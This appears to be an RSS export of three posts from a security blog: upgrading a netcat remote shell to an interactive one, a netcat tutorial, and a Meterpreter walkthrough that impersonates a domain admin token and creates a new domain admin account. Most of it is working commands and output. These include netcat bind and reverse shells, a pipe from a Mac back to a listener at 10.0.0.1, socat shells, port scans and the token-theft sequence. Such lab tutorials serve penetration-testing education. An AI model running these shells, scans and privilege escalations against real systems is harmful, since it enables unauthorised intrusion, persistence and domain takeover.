Interactive shell – GoSecure! https://www.gosecure.it/blog MyDear(root)Shell Mon, 20 Jan 2014 15:03:00 +0000 en-US hourly 1 https://wordpress.org/?v=5.6 From a non interactive shell to an interactive one https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/ https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/#respond Tue, 18 Jun 2013 10:08:59 +0000 https://www.gosecure.it/blog/?p=118 read more)]]> As you can read at the end of this post a remote shell using command execution (-e cmd.exe or /bin/bash) isn’t a full interactive command prompt.
These are solutions I found to have a more stable shell. Note that I don’t talk about a web remote shell as c99, c100, weevely or other php/asp code that need a web server. Also I don’t want to talk about MSFvenom and similar, but I focused on something similar to NC or SSH.

The target is a Linux system.
Using Pyton:
After you get a Netcat remote shell execute

python -c 'import pty; pty.spawn("/bin/bash");'

This is non completly interactive, but is better than before.

Is Better to use socat that is a more complex variant of netcat.
Listener:

socat file:`tty`,raw,echo=0 tcp-listen:8999

Client:

socat tcp:127.0.0.1:8999 exec:"bash -li",pty,stderr,setsid,sigint,sane

This is a full interactive remote shell

The target is a Windows system.
I suppose that in Microsoft environment you don’t have pyton or socat, although the two programs have Windows binary.
So the better way I found is to start a telnet server. Googling I found some stand alone programs like TelnetD. Note that isn’t a free software, but you can try it using the Trial Version.

]]>
https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/feed/ 0
Some tricks using Netcat https://www.gosecure.it/blog/art/87/sec/some-tricks-using-netcat/ https://www.gosecure.it/blog/art/87/sec/some-tricks-using-netcat/#respond Mon, 17 Jun 2013 16:02:07 +0000 https://www.gosecure.it/blog/?p=87 read more)]]> If you are here, I suppose you know that Netcat (NC) is an utility which reads and writes data across network connections, using TCP or UDP transport. Nothing more, nothing less.
Let’s see some exemples of use.
First of all let’s read the help output:

C:\>nc.exe -h
[v1.11 NT www.vulnwatch.org/netcat/]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, background mode

        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

This is the Windows version of Netcat, but options are similar also in Linux. The version I found for MacOS don’t have the -e option, but you can recompile it to enable this option or use some workaround as I will explain.

First try: open two command windows in the same machine. In the first window start a service that listens on a specific port using Netcat (this is called listener)

C:\>nc.exe -l -v -p 4444

If you have a look at the network connection of your machine, using the command netstat -na, you will find a listening connection on port 4444 tcp 0.0.0.0:4444 LISTEN
In the second window use NC as a client and connect to localhost on port 4444

C:\>nc.exe 127.0.0.1 4444 -v

Hit enter and you establish a simple connection with NC, but what is this?
Essentially is a simple chat. If in window 1 you write something it will redirect to windows 2 and vice versa.
So NC is a program that allows you to communicate using TCP or UDP protocols and you can use it whether as a client or as a server. TCP/UDP connections are more useful than a simple chat: you can use NC to test if a remote port is open, to grab information about a service listening on a remote PC (the banner) and to connect to this service; otherwise you can use it to redirect text, request html page, and, last but not least, remotely admin a PC.

Lets try NC to pass simple text file. This time I will use Linux because of its more simple command shell, but you can implement the same thing on Windows.
So, I try to pass text file starting the folowing listener

root@kali:~# nc -lvp 4444 > file.txt

…and than connect

root@kali:~# echo "This text will be transmitted using Netcat" | nc 127.0.0.1 4444

This can be useful to create or modify remotly config file as this:

root@kali:~# nc -lp 4444 >> /etc/proxychains.conf
root@kali:~# cat new_proxy_to_add.txt | nc 127.0.0.1 4444

…or simply add something to your TODO list

root@kali:~# nc -lp 4444 >> /doc/TODO.txt
root@kali:~# echo -e "Wash girlfriend car\nBuy beer\nDebug my friend app" | nc 127.0.0.1 4444

And now let’s transfer a file (note the -w option used to end connection and to unlock the file transferred):

root@kali:~# nc -lp 4444 < myfile.zip
root@kali:~# nc -w 1 127.0.0.1 4444 > myfile_renamed.zip

Well, NC can be used to connect to listeners. If there is a service listening on some TCP/UDP port you can try to connect, and sometimes even interact with it:

root@kali:~# nc 127.0.0.1 21
220 (vsFTPd 2.3.5)
USER user-one
331 Please specify the password.
PASS ******
230 Login successful.

In some other case NC isn’t able to interact, but can be useful to grub banner and find what kind of service is listening. Look at the following command: you find a OpenSSH server on non-standard tcp port 2201.

root@kali:~# nc -v 127.0.0.1 2201
localhost [127.0.0.1] 2201 (?) open
SSH-2.0-OpenSSH_6.0p1 Debian-4

Protocol mismatch.

You can implement this idea using -z option and transfotm NC in a port scanner. You will also like to specify port range.

root@kali:~# nc -zv 127.0.0.1 1-3000
localhost [127.0.0.1] 2201 (?) open
localhost [127.0.0.1] 1111 (?) open
localhost [127.0.0.1] 80 (http) open
localhost [127.0.0.1] 21 (ftp) open

If you use the -o option you can dump all hex traffic:

root@kali:~# nc 127.0.0.1 4444 -vo /tmp/log.txt
localhost [127.0.0.1] 4444 (?) open
hello
my password is ****** yes six asterisks
^C
root@kali:~# cat /tmp/log.txt
< 00000000 68 65 6c 6c 6f 0a                               # hello.
> 00000000 6d 79 20 70 61 73 73 77 6f 72 64 20 69 73 20 2a # my password is *
> 00000010 2a 2a 2a 2a 2a 20 79 65 73 20 73 69 78 20 61 73 # ***** yes six as
> 00000020 74 65 72 69 73 6b 73 0a                         # terisks.

Let’s now talk about remote admin. You can use -e option to execute programs, in this case cmd.exe or /bin/bash.
So, start a listener in one terminal window:

c:\>nc.exe -lvp 4444 -e cmd.exe
listening on [any] 4444 ...

…and connect to it using a second command shell:

c:\>nc.exe 127.0.0.1 4444
Microsoft Windows [Versione 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Tutti i diritti riservati.

c:\>hostname
hostname
windows-pc01

c:\FAKE_Path>

You can also set the listener without -e option and use it on the client. The result will be a remore shell of the client on the machine with the listener.
Of course you can put together text/command redirection and command execution. Look at the immage below.

Image 1

We have 3 PCs: machine A and B are Linux, machine C is Windows. Let’s start 2 listeners in two different windows in Machine A; then one listener with -e option on the Windows PC. When all listeners are ready let’s put all together running the 3 clients from Machine B. we wait some seconds and … TA-DAAA! In the Machine A we have a remote shell of the Windows system. Note that pipeling in Machine B has as effect that, in Machine A, you write the command in shell 1 and read output in shell 2.
This sound like a remote shell using a proxy…

Now let’s try the MacOS Netcat version. The only preconpiled version I found is an old one, non supporting “executing command” option (-e). Although we can compile a surce code that incluce the option we want, we can also modify the previous exemple to make command execution working.
Start on a machine (IP=10.0.0.1) two shell each one with a listener.

nc -lvp 4444
nc -lvp 3333

In the remote Mac you have to admin, start a pipeling as this:

user@mymac:~$ nc 10.0.0.1 4444 | /bin/bash | nc 10.0.0.1 3333

Great! You have a remote shell of your Mac.

That’s why netcat is so important. It is so simple and so powerful that you can use it either for basic connection tests or in a complex environment, but the most important thing is that is cross-platform, single file and stand-alone program. It can also be used to implement many complex environment as proxy, sniffer, logger, secure chat, debbugger, fuzzer. You can even use it backup your disk partition on another PC (how to copy compressed drive image over network).
Nowadays there are many Netcat clones, some of these use encryption or implement the remote command execution and the use of passwords; you can easely find it googling.

Obviously not always it work as we’ll wish. One exemple overall: when we start a remote shell using NC with -e option we don’t have a FULL interactive command prompt, but a NON interactive one. To better understand try this: connect to an FTP server using NC directly. You will prompt to insert USER and then PASS and everything works, but if you try to connect to the FTP server from a remote shell (using NC aswell) you will promt to insert USER and, when you hit enter, your session will hang.
In this post you can find some solutions to reach a full interactive shell from a NC non interactive shell.

You can find more info on NetCat Home Page.

]]>
https://www.gosecure.it/blog/art/87/sec/some-tricks-using-netcat/feed/ 0
Create a domain user admin through an exploited PC https://www.gosecure.it/blog/art/59/sec/create-a-domain-user-admin-through-an-exploited-domain-pc/ https://www.gosecure.it/blog/art/59/sec/create-a-domain-user-admin-through-an-exploited-domain-pc/#respond Tue, 07 May 2013 17:35:10 +0000 https://www.gosecure.it/blog/?p=59 read more)]]> The server and pc hardening is the process of securing a system, limiting the surface that can be attacked. One of its role is to limitate the use of amministrative right.
Nowadays users have to use an unprivileged accounts, also sysadmins have to remind this role when configuring service and scripts.
Sometimes, to let centralized software to work correctly, sysadmins install client agents to work with high privileged account and this can be used to scalate privileges.
This is how to create a domain user admin through an exploited domain PC with local machine administration rights.

The domain is called LAB.local based on Windows 2008R2. LABServer07 is the primary DC.
The exploited machine is joined to the domain and we got a Meterpreter shell with local PC admin rights.

Basic command used after exploit:
Find process –> meterpreter > ps
Load incognito extension –> meterpreter > use incognito
Listing available tokens –> meterpreter > list_tokens -u
Impersonate token –> meterpreter > impersonate_token
Get a command shell using the token –> meterpreter > execute -f cmd.exe -i -t -H -c
Add a domain User –> C:\WINDOWS\system32>net user USER PASSWORD /add /domain
Add the creted user in domain admin –> C:\WINDOWS\system32>net localgroup administrators USER /add /domain

Interact with session 1 and list process:

msf exploit(psexec) > sessions -i 1[*] Starting interaction with 1...

meterpreter > ps

Process list
============

 PID   Name              Arch  Session  User                           Path
 ---   ----              ----  -------  ----                           ----
 0     [System Process]
 4     System            x86   0        NT AUTHORITY\SYSTEM
 1736  smss.exe          x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 1788  csrss.exe         x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 1812  winlogon.exe      x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 1856  services.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 1868  lsass.exe         x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 2032  ibmpmsvc.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\ibmpmsvc.exe
 176   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 312   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
 404   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 508   EvtEng.exe        x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\EvtEng.exe
 604   S24EvMon.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\S24EvMon.exe
 824   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
 848   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
 1228  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1304  svchost.exe       x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
 1344  AcPrfMgrSvc.exe   x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
 1416  btwdins.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\Bluetooth Software\bin\btwdins.exe
 1484  RegSrvc.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\RegSrvc.exe
 1676  TpKmpSvc.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\TpKmpSVC.exe
 180   AcSvc.exe         x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcSvc.exe
 700   MOMService.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Microsoft Forefront\Client Security\Client\Microsoft Operations Manager 2005\MOMService.exe
 224   wmiprvse.exe      x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 948   SvcGuiHlpr.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\SvcGuiHlpr.exe
 2580  alg.exe           x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\System32\alg.exe
 3276  explorer.exe      x86   0        LAB\utente1                    C:\WINDOWS\Explorer.EXE
 3908  tp4mon.exe        x86   0        LAB\utente1                    C:\WINDOWS\system32\tp4mon.exe
 1112  igfxtray.exe      x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxtray.exe
 1124  hkcmd.exe         x86   0        LAB\utente1                    C:\WINDOWS\system32\hkcmd.exe
 2192  igfxpers.exe      x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxpers.exe
 1860  ACTray.exe        x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACTray.exe
 2596  ACWLIcon.exe      x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACWLIcon.exe
 2700  smax4pnp.exe      x86   0        LAB\utente1                    C:\Programmi\Analog Devices\Core\smax4pnp.exe
 2904  ctfmon.exe        x86   0        LAB\utente1                    C:\WINDOWS\system32\ctfmon.exe
 3076  BTTray.exe        x86   0        LAB\utente1                    C:\Programmi\ThinkPad\Bluetooth Software\BTTray.exe
 3572  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
 2912  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
 1472  rundll32.exe      x86   0        LAB\admin                 C:\WINDOWS\system32\rundll32.exe                           <---------- Look at these
 1256  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
 3044  msiexec.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\msiexec.exe
 3224  rundll32.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\rundll32.exe

Load extension, list token and impersonate domain admin:

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
LAB\admin
LAB\utente1
NT AUTHORITY\SERVIZIO DI RETE
NT AUTHORITY\SERVIZIO LOCALE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ACCESSO ANONIMO

meterpreter > impersonate_token lab\\admin          <---------- Double backslash DOMAIN\\name
[+] Delegation token available
[+] Successfully impersonated user LAB\admin

meterpreter > getuid
Server username: lab\admin

Get a domain admin shell:

meterpreter > execute -f cmd.exe -i -t -H -c
Process 3804 created.
Channel 1 created.
Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32>

Create new domain user and join to the domain admins group:

C:\WINDOWS\system32>net user TestUser Passw0rd /add /domain
net user TestUser Passw0rd /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.


C:\WINDOWS\system32>net localgroup /domain
net localgroup /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.


Alias per \\LABServer07.lab.local

-------------------------------------------------------------------------------
*Accesso compatibile precedente a Windows 2000
*Accesso DCOM a Servizi certificati
*Account Operators
*Administrators
*Backup Operators
*Cert Publishers
*Cryptographic Operators
*Distributed COM Users
*DnsAdmins
*Gruppo di accesso autorizzazione Windows
*Guests
*IIS_IUSRS
*Incoming Forest Trust Builders
*Lettori registri eventi
*Network Configuration Operators
*Ogg. autorizzati a replica passw. in controller sola lettura
*Ogg. non autoriz. a replica passw. in controller sola lettura
*Performance Log Users
*Performance Monitor Users
*Print Operators
*Replicator
*Server licenze di Terminal Server
*Server Operators
*Server RAS e IAS
*Users
*Utenti desktop remoto
Esecuzione comando riuscita.

C:\WINDOWS\system32>net localgroup administrators TestUser /add /domain
net localgroup administrators TestUser /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.

Obviously the victim PC is an Italian version, “esecuzione comando riuscita” means “Command completed successfully”

]]>
https://www.gosecure.it/blog/art/59/sec/create-a-domain-user-admin-through-an-exploited-domain-pc/feed/ 0